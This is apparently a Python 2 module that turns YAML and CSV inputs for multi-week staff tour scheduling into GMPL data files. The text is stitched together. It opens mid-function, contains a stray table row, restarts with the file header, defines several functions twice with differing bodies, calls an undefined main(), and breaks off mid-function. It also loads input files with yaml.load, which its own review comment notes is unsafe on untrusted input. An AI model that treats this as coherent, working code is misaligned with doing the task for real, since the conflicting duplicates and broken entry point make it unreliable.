            for w, val in enumerate(weekvals):
                pieces.append(' '.join(
                    [str(ttnum), str(len_x + 1), str(w + 1), str(val)]) + ' \n')
    pieces.append(';\n')
    out = ''.join(pieces)
    if not isStringIO:
        return out
    buf = StringIO.StringIO()
    buf.write(out)
    return buf.getvalue()
def list_to_indexedset(sname,slist,isStringIO=True):
    """
    Render a list of lists as a GMPL indexed set declaration.

    Inputs:
        sname - set name to use in the GMPL file
        slist - list of lists; element i holds the members of set i+1
        isStringIO - True to route the result through a StringIO buffer,
                     False to return the plain string

    Output:
        GMPL dat code such as:

        set tt_length_x[1] :=
        5 6;
    """
    chunks = []
    for pos, members in enumerate(slist):
        chunks.append('set ' + sname + '[' + str(pos + 1) + '] :=\n')
        chunks.append(' '.join([str(m) for m in members]) + ';\n')
    gset = ''.join(chunks)
    if not isStringIO:
        return gset
    buf = StringIO.StringIO()
    buf.write(gset)
    return buf.getvalue()
def mix_days_prds_params(ttspec,pname,nonshiftlen_pname,shiftlen_pname,isStringIO=True):
    """
    Render one family of tour type day/period bounds (cumulative or not,
    shift-length specific or not) as a GMPL dat parameter.

    Wrapper that dispatches to shiftlencons_to_param() when pname names a
    shift-length specific parameter (contains 'shiftlen') and to
    list_to_param() otherwise.

    Inputs:
        ttspec - tour type spec object loaded from the YAML mix file
        pname - GMPL parameter name; 'shiftlen' in the name selects the
                shift-length specific path
        nonshiftlen_pname - YAML key for the non-shift-length value
        shiftlen_pname - YAML key for the shift-length specific values
        isStringIO - unused here; retained for signature compatibility

    Output:
        GMPL dat code produced by the dispatched helper.
    """
    shiftlen_specific = 'shiftlen' in pname
    vals = []
    for tt in ttspec['tourtypes']:
        if shiftlen_specific:
            vals.append([sl[shiftlen_pname] for sl in tt['shiftlengths']])
        elif nonshiftlen_pname in tt:
            vals.append(tt[nonshiftlen_pname])
        else:
            # Fall back to the first shift length's value when the tour
            # type does not carry the non-shift-length key.
            vals.append(tt['shiftlengths'][0][shiftlen_pname])
    if shiftlen_specific:
        return shiftlencons_to_param(pname, ttspec, vals)
    return list_to_param(pname, vals)
def mix_to_dat(probspec,isStringIO=True):
    """
    Read the YAML mix file named in probspec and generate all of the GMPL
    dat components associated with the tour type mix inputs.

    Inputs:
        probspec - problem spec object loaded from the YAML ini file. The
                   mix filename comes from
                   probspec['reqd_files']['filename_mix']; optional tour
                   type bounds come from
                   probspec['opt_files']['filename_ttbounds'].
        isStringIO - retained for signature compatibility; a plain string
                     is returned either way

    Output:
        GMPL dat code (string) for all mix-related sets and parameters.
    """
    # Open the mix file and load it into a YAML object
    fn_mix = probspec['reqd_files']['filename_mix']
    fin = open(fn_mix,"r")
    ttspec = yaml.load(fin)
    fin.close()   # BUG FIX: the mix file handle was never closed
    mixout = StringIO.StringIO()
    # Distinct shift lengths, ascending (delegated to the helper for
    # consistency with the rest of the module)
    lengths = get_lengths_from_mix(ttspec)
    len_param = list_to_param('lengths', lengths)
    # Number of shift lengths
    n_lengths = size(lengths)
    numlen_param = scalar_to_param('n_lengths', n_lengths)
    # Number of tour types
    n_ttypes = size(ttspec['tourtypes'])
    numttypes_param = scalar_to_param('n_tts', n_ttypes)
    # Tour type length sets
    lenxset = get_length_x_from_mix(ttspec)
    lenxset_set = list_to_indexedset('tt_length_x', lenxset)
    # Midnight threshold for weekend assignments
    midthresholds = [m['midnight_thresh'] for m in ttspec['tourtypes']]
    midthresh_param = list_to_param('midnight_thresh', midthresholds)
    # Parttime flag and bound
    ptflags = [m['is_parttime'] for m in ttspec['tourtypes']]
    ptflags_param = list_to_param('tt_parttime', ptflags)
    ptfrac = ttspec['max_parttime_frac']
    ptfrac_param = scalar_to_param('max_parttime_frac', ptfrac)
    # Global start window width
    width = ttspec['g_start_window_width']
    width_param = scalar_to_param('g_start_window_width', width)
    # Lower and upper bounds on number scheduled; an optional ttbounds
    # file overrides the values carried in the mix file.
    if 'opt_files' in probspec and 'filename_ttbounds' in probspec['opt_files']:
        fn_ttbnds = probspec['opt_files']['filename_ttbounds']
        fin_ttbnds = open(fn_ttbnds,"r")
        ttbndsspec = yaml.load(fin_ttbnds)
        fin_ttbnds.close()   # BUG FIX: handle was never closed
        tt_lb = [m['tt_lb'] for m in ttbndsspec['tourtypes']]
        tt_ub = [m['tt_ub'] for m in ttbndsspec['tourtypes']]
    else:
        tt_lb = [m['tt_lb'] for m in ttspec['tourtypes']]
        tt_ub = [m['tt_ub'] for m in ttspec['tourtypes']]
    tt_lb_param = list_to_param('tt_lb', tt_lb)
    tt_ub_param = list_to_param('tt_ub', tt_ub)
    # Cost multiplier
    tt_cost_multiplier = [m['tt_cost_multiplier'] for m in ttspec['tourtypes']]
    tt_cost_multiplier_param = list_to_param('tt_cost_multiplier',
        tt_cost_multiplier)
    # Min and max days and prds worked over the weeks
    tt_min_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_dys_weeks','min_days_week',
        'min_shiftlen_days_week')
    tt_max_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_dys_weeks','max_days_week',
        'max_shiftlen_days_week')
    tt_min_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_prds_weeks','min_prds_week',
        'min_shiftlen_prds_week')
    tt_max_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_prds_weeks','max_prds_week',
        'max_shiftlen_prds_week')
    # Min and max days and prds worked over the weeks
    # for each shift length workable in the tour type
    tt_shiftlen_min_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_dys_weeks','min_days_week',
        'min_shiftlen_days_week')
    tt_shiftlen_max_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_dys_weeks','max_days_week',
        'max_shiftlen_days_week')
    tt_shiftlen_min_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_prds_weeks','min_prds_week',
        'min_shiftlen_prds_week')
    tt_shiftlen_max_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_prds_weeks','max_prds_week',
        'max_shiftlen_prds_week')
    # Min and max cumulative days and prds worked each week
    tt_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_cumul_dys_weeks','min_cumul_days_week',
        'min_shiftlen_cumul_days_week')
    tt_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_cumul_dys_weeks','max_cumul_days_week',
        'max_shiftlen_cumul_days_week')
    tt_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_cumul_prds_weeks','min_cumul_prds_week',
        'min_shiftlen_cumul_prds_week')
    tt_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_cumul_prds_weeks','max_cumul_prds_week',
        'max_shiftlen_cumul_prds_week')
    # Min and max cumulative days and prds worked over the weeks
    # for each shift length workable in the tour type
    tt_shiftlen_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_cumul_dys_weeks','min_cumul_days_week',
        'min_shiftlen_cumul_days_week')
    tt_shiftlen_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_cumul_dys_weeks','max_cumul_days_week',
        'max_shiftlen_cumul_days_week')
    tt_shiftlen_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_min_cumul_prds_weeks','min_cumul_prds_week',
        'min_shiftlen_cumul_prds_week')
    tt_shiftlen_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_shiftlen_max_cumul_prds_weeks','max_cumul_prds_week',
        'max_shiftlen_cumul_prds_week')
    # Assemble all pieces; each chunk is followed by a newline, matching
    # the output of the original 'print >>' statements.
    for piece in (numlen_param, len_param, numttypes_param, lenxset_set,
                  midthresh_param, tt_lb_param, tt_ub_param,
                  tt_cost_multiplier_param, ptflags_param, ptfrac_param,
                  width_param,
                  tt_min_cumul_dys_weeks_param, tt_max_cumul_dys_weeks_param,
                  tt_min_cumul_prds_weeks_param, tt_max_cumul_prds_weeks_param,
                  tt_min_dys_weeks_param, tt_max_dys_weeks_param,
                  tt_min_prds_weeks_param, tt_max_prds_weeks_param,
                  tt_shiftlen_min_dys_weeks_param,
                  tt_shiftlen_max_dys_weeks_param,
                  tt_shiftlen_min_prds_weeks_param,
                  tt_shiftlen_max_prds_weeks_param,
                  tt_shiftlen_min_cumul_dys_weeks_param,
                  tt_shiftlen_max_cumul_dys_weeks_param,
                  tt_shiftlen_min_cumul_prds_weeks_param,
                  tt_shiftlen_max_cumul_prds_weeks_param):
        mixout.write(piece)
        mixout.write('\n')
    # BUG FIX: the isStringIO=False branch previously returned
    # mixout.read(), which yields '' because the buffer position sits at
    # the end after the writes above; getvalue() is correct in both cases.
    return mixout.getvalue()
def get_length_x_from_mix(ttspec):
    """
    Build, for each tour type, the 1-based indexes of its allowable shift
    lengths within the globally sorted shift length list.

    Inputs:
        ttspec - yaml representation of tour type mix parameters

    Output:
        List of lists of 1-based shift length indexes, one inner list per
        tour type. Example: [[1,2],[2]]
    """
    # Collect the distinct shift lengths across all tour types, ascending.
    all_lengths = set()
    for tt in ttspec['tourtypes']:
        for sl in tt['shiftlengths']:
            all_lengths.add(sl['numbins'])
    all_lengths = sorted(all_lengths)
    result = []
    for tt in ttspec['tourtypes']:
        idxs = sorted(all_lengths.index(sl['numbins']) + 1
                      for sl in tt['shiftlengths'])
        result.append(idxs)
    return result
def get_lengths_from_mix(ttspec):
    """
    Return the distinct shift lengths used anywhere in the mix, ascending.

    Inputs:
        ttspec - yaml representation of tour type mix parameters

    Output:
        Sorted list of shift lengths, e.g. [8, 16, 20, 24]
    """
    distinct = set()
    for tt in ttspec['tourtypes']:
        distinct.update(sl['numbins'] for sl in tt['shiftlengths'])
    return sorted(distinct)
def csvrow_to_yaml(fn_csv, isStringIO=True):
    """
    Convert rows of comma (or semicolon) delimited data into a YAML list
    representation suitable for insertion into the YAML mix file.

    The routine is content-agnostic: it simply converts each delimited
    row into one YAML sequence item.

    Inputs:
        fn_csv - csv filename containing rows of size n_periods_per_day
        isStringIO - True to route the result through a StringIO buffer,
                     False to return the plain string

    Output:
        YAML text with one ' - [v1, v2, ...]' line per input row.

    Example:
        Input:   0, 1, 0, 0
        Output:   - [0.0, 1.0, 0.0, 0.0]
    """
    fin = open(fn_csv,'r')
    try:
        # Sniff whether the file is comma or semicolon delimited.
        dialect = csv.Sniffer().sniff(fin.read(1024),delimiters=',;')
        fin.seek(0)
        ash_data = csv.reader(fin,dialect)
        # List comprehension (not map) so each row is a real list of
        # floats; str() of that list yields YAML flow-sequence syntax.
        ash_list = [[float(c) for c in row] for row in ash_data]
    finally:
        # BUG FIX: was 'fin.close' (missing parens), which never actually
        # closed the file.
        fin.close()
    yamlstr = ''
    for row in ash_list:
        yamlstr += (' - ' + str(row) + '\n')
    if isStringIO:
        yamlout = StringIO.StringIO()
        yamlout.write(yamlstr)
        return yamlout.getvalue()
    else:
        return yamlstr
def ash_to_dat(fn_yni,fn_mix,isStringIO=True):
    """
    Convert allowable shift start time inputs into GMPL dat form.

    Inputs:
        fn_yni - filename of yaml ini scenario file (loaded but the result
                 is currently unused -- kept for interface compatibility)
        fn_mix - filename of yaml tour type mix file
        isStringIO - True to route the result through a StringIO buffer,
                     False to return the plain string

    Output:
        GMPL dat code for the allow_start parameter, e.g.:

        param allow_start:=
        1 1 1 2 0.0
        2 1 1 2 0.0
        ...
    """
    # NOTE(review): yaml.load is unsafe on untrusted input; consider
    # yaml.safe_load if these files can come from outside the project.
    fin_yni = open(fn_yni,"r")
    probspec = yaml.load(fin_yni)
    fin_yni.close()   # BUG FIX: handle was never closed
    fin_mix = open(fn_mix,"r")
    ttspec = yaml.load(fin_mix)
    fin_mix.close()   # BUG FIX: handle was never closed
    # Each row is: period, day, shift length index, tour type, value.
    # NOTE(review): the header comment in the model describes the indexes
    # as [i,j,t,s] while the rows below emit (i, j, length index, ttnum)
    # -- confirm against the GMPL model's declaration of allow_start.
    # NOTE(review): despite its name, lenxset holds the sorted shift
    # lengths (get_lengths_from_mix), not the per-tour-type index sets.
    lenxset = get_lengths_from_mix(ttspec)
    ash_rows = []
    for m in ttspec['tourtypes']:
        for s in m['shiftlengths']:
            for j in range(len(s['allowable_starttimes'])):
                for i in range(len(s['allowable_starttimes'][j])):
                    # 0-based position of this shift length in the
                    # globally sorted length list.
                    length_x = lenxset.index(s['numbins'])
                    L = [i+1,j+1,length_x+1,m['ttnum'],s['allowable_starttimes'][j][i]]
                    ash_rows.append(L)
    param = 'param allow_start:=\n'
    for val in ash_rows:
        datarow = ' '.join(map(str, val)) + '\n'
        param += datarow
    param += ";\n"
    if isStringIO:
        paramout = StringIO.StringIO()
        paramout.write(param)
        return paramout.getvalue()
    else:
        return param
## p = [(0,1),(1,1),(0,0),(1,0)]
## n = num_full_weekends(p,1)
def mwts_createdat(fn_yni,fn_dat):
    """
    Create a GMPL dat file for a multi-week tour scheduling (mwts) problem.

    Inputs:
        fn_yni - name of the YAML ini (scenario) input file
        fn_dat - name of the GMPL dat file to create

    Output:
        Writes the assembled dat code to fn_dat; returns None.
    """
    fin = open(fn_yni,"r")
    probspec = yaml.load(fin)
    fin.close()   # BUG FIX: input file handle was never closed
    # General section
    num_prds_per_day_param = scalar_to_param('n_prds_per_day',
        probspec['time']['n_prds_per_day'])
    num_days_per_week_param = scalar_to_param('n_days_per_week',
        probspec['time']['n_days_per_week'])
    num_weeks_param = scalar_to_param('n_weeks',
        probspec['time']['n_weeks'])
    # Cost related
    labor_budget_param = scalar_to_param('labor_budget',
        probspec['cost']['labor_budget'])
    cu1_param = scalar_to_param('cu1', probspec['cost']['understaff_cost_1'])
    cu2_param = scalar_to_param('cu2', probspec['cost']['understaff_cost_2'])
    usb_param = scalar_to_param('usb', probspec['cost']['understaff_1_lb'])
    # Demand section
    dmd_dat = dmd_min_to_dat('dmd_staff',probspec['reqd_files']['filename_dmd'],mode='unsliced')
    # Min staff section
    min_dat = dmd_min_to_dat('min_staff',probspec['reqd_files']['filename_min'],mode='unsliced')
    # Mix section
    mix_dat = mix_to_dat(probspec)
    # Weekends worked patterns section
    wkends_dat = wkends_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
    # Allowable shift start time section
    ash_dat = ash_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
    # Assemble the pieces. Each chunk is followed by a newline, matching
    # the output of the original 'print >>' statements.
    dat = StringIO.StringIO()
    for piece in (num_prds_per_day_param, num_days_per_week_param,
                  num_weeks_param, labor_budget_param, cu1_param,
                  cu2_param, usb_param, mix_dat, dmd_dat, min_dat,
                  wkends_dat, ash_dat):
        dat.write(piece)
        dat.write('\n')
    fout = open(fn_dat,"w")
    fout.write(dat.getvalue())
    fout.write('\n')
    fout.close()
# Script entry point.
# NOTE(review): main() is not defined anywhere in the visible portion of
# this module -- confirm it is defined elsewhere in the file.
if __name__ == '__main__':
    main()
| 32.451098 | 164 | 0.605548 | #-------------------------------------------------------------------------------
# Name: mwts_makedat
# Purpose: mwts dat file creation
#
# Author: isken
#
# Created: 28/09/2011
# Copyright: (c) isken 2011
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
import sys
import StringIO
import yaml
from numpy import *
import csv
import json
import itertools
"""
mwts_makedat is a module for reading input files for mwts problems
and creating an AMPL/GMPL data file.
It is a replacement for the ancient createssdat.c program that was
used to create AMPL/GMPL dat files for one week tour scheduling problems.
"""
def create_weekend_base(n_weeks):
    """
    Enumerate every possible weekends-worked pattern over n_weeks weeks.

    Each week is represented by a 2-element list of binary values for the
    two weekend days (1 = worked, 0 = off); a pattern is a tuple holding
    one such pair per week.

    Input:
        n_weeks - number of weeks in scheduling horizon

    Output:
        List of all 4**n_weeks possible weekend patterns. For n_weeks = 4
        that is 256 patterns; the exhaustive list is typically filtered
        afterwards to keep only the desirable ones.
    """
    per_week_choices = [[0,0],[1,0],[0,1],[1,1]]
    # Cartesian product of the per-week choices, one factor per week.
    return list(itertools.product(*([per_week_choices] * n_weeks)))
def filterpatterns(pattern,ttnum,wkendtype,ttspec):
    """
    Decide whether a weekends-worked pattern is acceptable for a tour type.

    For now the filtering rules are hard coded; a flexible rule
    specification mechanism is still TODO.

    Inputs:
        pattern - sequence of 2-tuples of binary values, one per week; a 1
                  means that weekend day is worked, a 0 means it is off
        ttnum - tour type number whose rules should be applied
        wkendtype - 1 --> weekend is Saturday and Sunday
                    2 --> weekend is Friday and Saturday
        ttspec - tour type spec; supplies max_days_worked and
                 half_weekends_ok for the tour type

    Output:
        True --> keep pattern, False --> discard pattern
    """
    keep = True
    tourtype = [t for t in ttspec['tourtypes'] if t['ttnum'] == ttnum]
    # Rule 1: no more than max_days_worked weekend days over the horizon.
    # BUG FIX: the original computed sum(pattern) over a sequence of week
    # tuples, which raises TypeError; sum the individual day flags.
    max_days_worked = tourtype[0]['max_days_worked']
    if sum(sum(week) for week in pattern) > max_days_worked:
        keep = False
    # Rule 2: limit work across consecutive weekends (with wraparound).
    # BUG FIX: sum(pair) also raised TypeError on a pair of week tuples.
    # NOTE(review): the original threshold (discard when > 2 days worked
    # over two consecutive weekends) is preserved here, although the
    # original comment suggested disallowing any two consecutive weekends
    # each with >= 1 day worked -- confirm the intended rule.
    for pair in ntuples(pattern,2):
        if sum(pair[0]) + sum(pair[1]) > 2:
            keep = False
    # Rule 3: optionally disallow half weekends entirely.
    if not tourtype[0]['half_weekends_ok'] and num_half_weekends(pattern,wkendtype) > 0:
        keep = False
    return keep
def num_full_weekends(x,wkendtype):
    """
    Count the full weekends (both days worked) in a weekends-worked
    pattern.

    Inputs:
        x - list of 2-tuples of binary values, one tuple per week. A 1
            means that weekend day is worked, a 0 means it is off.
        wkendtype - 1 --> weekend consists of Saturday and Sunday
                    2 --> weekend consists of Friday and Saturday

    Output:
        Number of full weekends worked

    Example:
        n = num_full_weekends([(0,1),(1,0),(0,1),(1,0)],1)   # n = 2
        n = num_full_weekends([(1,1),(1,0),(1,1),(1,0)],2)   # n = 2
    """
    if wkendtype == 2:
        # Both weekend days live in the same week tuple.
        return len([wk for wk in x if sum(wk) == 2])
    # Type 1: day 2 of week j pairs with day 1 of week j+1, wrapping from
    # the final week back to the first.
    count = 0
    n_weeks = len(x)
    for j in range(n_weeks):
        nxt = (j + 1) % n_weeks
        if x[j][1] == 1 and x[nxt][0] == 1:
            count += 1
    return count
def num_half_weekends(x,wkendtype):
    """
    Count the half weekends (exactly one day worked) in a weekends-worked
    pattern.

    Inputs:
        x - list of 2-tuples of binary values, one tuple per week. A 1
            means that weekend day is worked, a 0 means it is off.
        wkendtype - 1 --> weekend consists of Saturday and Sunday
                    2 --> weekend consists of Friday and Saturday

    Output:
        Number of half weekends worked

    Example:
        n = num_half_weekends([(0,1),(1,0),(0,1),(0,0)],1)   # n = 1
        n = num_half_weekends([(0,1),(1,0),(0,1),(0,0)],2)   # n = 3
    """
    n = len(x)
    if wkendtype == 2:
        # Friday/Saturday share a week tuple: half weekend <=> sum == 1.
        return sum(1 for wk in x if sum(wk) == 1)
    # Type 1: day 2 of week j pairs with day 1 of week (j+1) mod n.
    return sum(1 for j in range(n) if x[j][1] + x[(j + 1) % n][0] == 1)
def ntuples(lst, n):
    """
    Return the circular sliding windows of length n over lst.

    Window i is (lst[i], lst[i+1], ..., lst[i+n-1]) with indexes wrapping
    around to the front of the sequence, so there are len(lst) windows.

    Example:
        ntuples([1, 2, 3], 2) --> [(1, 2), (2, 3), (3, 1)]
    """
    size = len(lst)
    return [tuple(lst[(i + k) % size] for k in range(n)) for i in range(size)]
def dmd_min_to_dat(gmpl_param_name,fn_dmd_or_min,mode='unsliced',isStringIO=True):
    """
    Convert a demand (or minimum staffing) input file to GMPL dat form.

    The input file holds one day per row and one column per period; e.g. a
    two week problem with half-hour periods has 14 rows and 48 columns.
    Values are target staffing levels and may be real numbers.

    Inputs:
        gmpl_param_name - parameter name to use in the GMPL file
        fn_dmd_or_min - whitespace delimited input filename
        mode - 'sliced' for the [*,*,week] matrix layout, anything else
               for the flat (period day week value) row layout
        isStringIO - True to route the result through a StringIO buffer,
                     False to return the plain string

    Output:
        GMPL dat code for the staffing parameter.
    """
    fin = open(fn_dmd_or_min,"r")
    try:
        # One row per day; split on whitespace and cast to float, giving
        # a 2D list-of-lists. Missing/extra columns are not checked --
        # the input file creator is assumed to have it right.
        days = [[float(tok) for tok in line.split()] for line in fin]
    finally:
        # BUG FIX: was 'fin.close' (missing parens), which never actually
        # closed the file.
        fin.close()
    # A 7 day week is always assumed. Floor division keeps this an int
    # under both Python 2 and 3.
    num_weeks = len(days) // 7
    num_prds = len(days[0])
    if mode == 'sliced':
        param = 'param ' + gmpl_param_name + ' := '
        for week in range(1,num_weeks + 1):
            # GMPL indexed-parameter slice header for this week.
            weekheader = '\n[*,*,{0}] :'.format(week) + '\n'
            weekheader += ' '.join(map(str, range(1,8)))
            weekheader += ' :=\n'
            param += weekheader
            # Transpose so days become columns and periods become rows.
            for prd in range(num_prds):
                prd_line = [prd + 1]
                prd_line.extend([days[(week-1)*7+day][prd] for day in range(7)])
                prd_line_out = '{0:3d}{1:7.2f}{2:7.2f}{3:7.2f}{4:7.2f}{5:7.2f}{6:7.2f}{7:7.2f}'.format(*prd_line)
                param += prd_line_out + '\n'
    else:  # Unsliced format
        # Regroup the day rows into weeks and emit one value per
        # (period, day, week) row via list_to_param. reverseidx makes the
        # rows come out in "period day week value" order.
        weeks_of_dmd = []
        for week in range(1,num_weeks + 1):
            week_of_days = [days[7*(week-1) + day] for day in range(7)]
            weeks_of_dmd.append(week_of_days)
        param = list_to_param(gmpl_param_name, weeks_of_dmd, reverseidx=True)
    if isStringIO:
        paramout = StringIO.StringIO()
        paramout.write(param)
        return paramout.getvalue()
    else:
        return param
##param dmd_staff := [*,*,1] :
## 1 2 3 4 5 6 7 :=
## 1 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 2 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 3 5.0 4.0 4.0 4.0 5.0 5.0 5.0
## 4 5.0 4.0 4.0 4.0 5.0 5.0 5.0
def scalar_to_param(pname,pvalue,isStringIO=True):
    """
    Render a scalar value as a single GMPL dat parameter statement.

    Inputs:
        pname - parameter name to use in the GMPL file
        pvalue - scalar parameter value
        isStringIO - True to pass the result through a StringIO buffer
                     before returning its contents, False to return the
                     string directly

    Output:
        GMPL dat code, e.g.:  param n_prds_per_day := 48;
    """
    text = ''.join(['param ', pname, ' := ', str(pvalue), ';\n'])
    if isStringIO:
        sink = StringIO.StringIO()
        sink.write(text)
        return sink.getvalue()
    return text
def list_to_param(pname,plist,reverseidx=False,isStringIO=True):
    """
    Render a (possibly nested) list as a GMPL dat parameter, one row per
    element with 1-based index labels.

    Inputs:
        pname - parameter name to use in the GMPL file
        plist - list holding the parameter values (may be N-dimensional)
        reverseidx - True to reverse the index order on each row
                     (effectively transposing the matrix)
        isStringIO - True to pass the result through a StringIO buffer,
                     False to return the string directly

    Output:
        GMPL dat code such as:

        param midnight_thresh:=
        1 100
        2 100
        ;
    """
    body = 'param ' + pname + ':=\n'
    # ndenumerate walks the array in C order, yielding the index tuple
    # and value for every element; GMPL indexes are 1-based.
    for index_tuple, value in ndenumerate(array(plist)):
        idx_strs = [str(component + 1) for component in index_tuple]
        if reverseidx:
            idx_strs = idx_strs[::-1]
        body += ' '.join(idx_strs) + ' ' + str(value) + '\n'
    body += ';\n'
    if isStringIO:
        sink = StringIO.StringIO()
        sink.write(body)
        return sink.getvalue()
    return body
def shiftlencons_to_param(pname,ttspec,plist,isStringIO=True):
    """
    Render shift-length specific day/period bound inputs as a GMPL dat
    parameter (rows: tourtype shiftlength week value).

    list_to_param() is unusable here because plist may be jagged (tour
    types can allow different numbers of shift lengths), so it cannot be
    converted to a numpy array for denumeration.

    Inputs:
        pname - parameter name to use in the GMPL file
        ttspec - tour type spec object loaded from the YAML mix file
        plist - jagged list indexed [tour type][shift length][week]
        isStringIO - True to pass the result through a StringIO buffer,
                     False to return the string directly
    """
    all_lengths = get_lengths_from_mix(ttspec)
    out = 'param ' + pname + ':=\n'
    for t_idx in range(len(plist)):              # tour types in the mix
        tt = ttspec['tourtypes'][t_idx]
        for s_idx in range(len(plist[t_idx])):   # shift lengths of the tt
            # Global 0-based position of this shift length in sorted order.
            len_pos = all_lengths.index(tt['shiftlengths'][s_idx]['numbins'])
            weekvals = plist[t_idx][s_idx]
            for w_idx in range(len(weekvals)):
                out += '%s %s %s %s \n' % (str(tt['ttnum']), str(len_pos + 1),
                                           str(w_idx + 1), str(weekvals[w_idx]))
    out += ';\n'
    if isStringIO:
        sink = StringIO.StringIO()
        sink.write(out)
        return sink.getvalue()
    return out
def list_to_indexedset(sname,slist,isStringIO=True):
    """
    Render a list of lists as a GMPL indexed set declaration.

    Inputs:
        sname - set name to use in the GMPL file
        slist - list of lists; element i holds the members of set i+1
        isStringIO - True to pass the result through a StringIO buffer,
                     False to return the string directly

    Output:
        GMPL dat code such as:

        set tt_length_x[1] :=
        5 6;
    """
    out = ''
    for i in range(len(slist)):
        members = ' '.join(str(v) for v in slist[i])
        out += 'set %s[%d] :=\n%s;\n' % (sname, i + 1, members)
    if isStringIO:
        sink = StringIO.StringIO()
        sink.write(out)
        return sink.getvalue()
    return out
def mix_days_prds_params(ttspec,pname,nonshiftlen_pname,shiftlen_pname,isStringIO=True):
    """
    Render one family of tour type day/period bounds (cumulative or not,
    shift-length specific or not) as a GMPL dat parameter.

    Dispatches to shiftlencons_to_param() when pname names a shift-length
    specific parameter (contains 'shiftlen') and to list_to_param()
    otherwise.

    Inputs:
        ttspec - tour type spec object loaded from the YAML mix file
        pname - GMPL parameter name; 'shiftlen' in the name selects the
                shift-length specific path
        nonshiftlen_pname - YAML key for the non-shift-length value
        shiftlen_pname - YAML key for the shift-length specific values
        isStringIO - unused here; retained for signature compatibility

    Output:
        GMPL dat code produced by the dispatched helper.
    """
    if 'shiftlen' in pname:
        # Shift-length specific family: one value list per shift length
        # of each tour type; jagged, hence shiftlencons_to_param.
        values = [[sl[shiftlen_pname] for sl in tt['shiftlengths']]
                  for tt in ttspec['tourtypes']]
        return shiftlencons_to_param(pname, ttspec, values)
    values = []
    for tt in ttspec['tourtypes']:
        # Prefer the tour-type level key; otherwise fall back to the
        # first shift length's value.
        if nonshiftlen_pname in tt:
            values.append(tt[nonshiftlen_pname])
        else:
            values.append(tt['shiftlengths'][0][shiftlen_pname])
    return list_to_param(pname, values)
def mix_to_dat(probspec,isStringIO=True):
    """
    Read the YAML mix file named in probspec and generate all of the GMPL
    dat components associated with the tour type mix inputs.

    Inputs:
        probspec - problem spec object loaded from the YAML ini file. The
                   mix filename comes from
                   probspec['reqd_files']['filename_mix']; optional tour
                   type bounds come from
                   probspec['opt_files']['filename_ttbounds'].
        isStringIO - retained for signature compatibility; a plain string
                     is returned either way

    Output:
        GMPL dat code (string) for all mix-related sets and parameters.
    """
    # Open the mix file and load it into a YAML object
    fn_mix = probspec['reqd_files']['filename_mix']
    fin = open(fn_mix,"r")
    ttspec = yaml.load(fin)
    fin.close()   # BUG FIX: the mix file handle was never closed
    mixout = StringIO.StringIO()
    # Distinct shift lengths, ascending (delegated to the helper for
    # consistency with the rest of the module)
    lengths = get_lengths_from_mix(ttspec)
    len_param = list_to_param('lengths', lengths)
    # Number of shift lengths
    n_lengths = size(lengths)
    numlen_param = scalar_to_param('n_lengths', n_lengths)
    # Number of tour types
    n_ttypes = size(ttspec['tourtypes'])
    numttypes_param = scalar_to_param('n_tts', n_ttypes)
    # Tour type length sets
    lenxset = get_length_x_from_mix(ttspec)
    lenxset_set = list_to_indexedset('tt_length_x', lenxset)
    # Midnight threshold for weekend assignments
    midthresholds = [m['midnight_thresh'] for m in ttspec['tourtypes']]
    midthresh_param = list_to_param('midnight_thresh', midthresholds)
    # Parttime flag and bound
    ptflags = [m['is_parttime'] for m in ttspec['tourtypes']]
    ptflags_param = list_to_param('tt_parttime', ptflags)
    ptfrac = ttspec['max_parttime_frac']
    ptfrac_param = scalar_to_param('max_parttime_frac', ptfrac)
    # Global start window width
    width = ttspec['g_start_window_width']
    width_param = scalar_to_param('g_start_window_width', width)
    # Lower and upper bounds on number scheduled; an optional ttbounds
    # file overrides the values carried in the mix file.
    if 'opt_files' in probspec and 'filename_ttbounds' in probspec['opt_files']:
        fn_ttbnds = probspec['opt_files']['filename_ttbounds']
        fin_ttbnds = open(fn_ttbnds,"r")
        ttbndsspec = yaml.load(fin_ttbnds)
        fin_ttbnds.close()   # BUG FIX: handle was never closed
        tt_lb = [m['tt_lb'] for m in ttbndsspec['tourtypes']]
        tt_ub = [m['tt_ub'] for m in ttbndsspec['tourtypes']]
    else:
        tt_lb = [m['tt_lb'] for m in ttspec['tourtypes']]
        tt_ub = [m['tt_ub'] for m in ttspec['tourtypes']]
    tt_lb_param = list_to_param('tt_lb', tt_lb)
    tt_ub_param = list_to_param('tt_ub', tt_ub)
    # Cost multiplier
    tt_cost_multiplier = [m['tt_cost_multiplier'] for m in ttspec['tourtypes']]
    tt_cost_multiplier_param = list_to_param('tt_cost_multiplier',
        tt_cost_multiplier)
    # Min and max days and prds worked over the weeks
    tt_min_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_dys_weeks','min_days_week',
        'min_shiftlen_days_week')
    tt_max_dys_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_dys_weeks','max_days_week',
        'max_shiftlen_days_week')
    tt_min_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_min_prds_weeks','min_prds_week',
        'min_shiftlen_prds_week')
    tt_max_prds_weeks_param = mix_days_prds_params(ttspec,
        'tt_max_prds_weeks','max_prds_week',
        'max_shiftlen_prds_week')
    # Min and max days and prds worked over the weeks
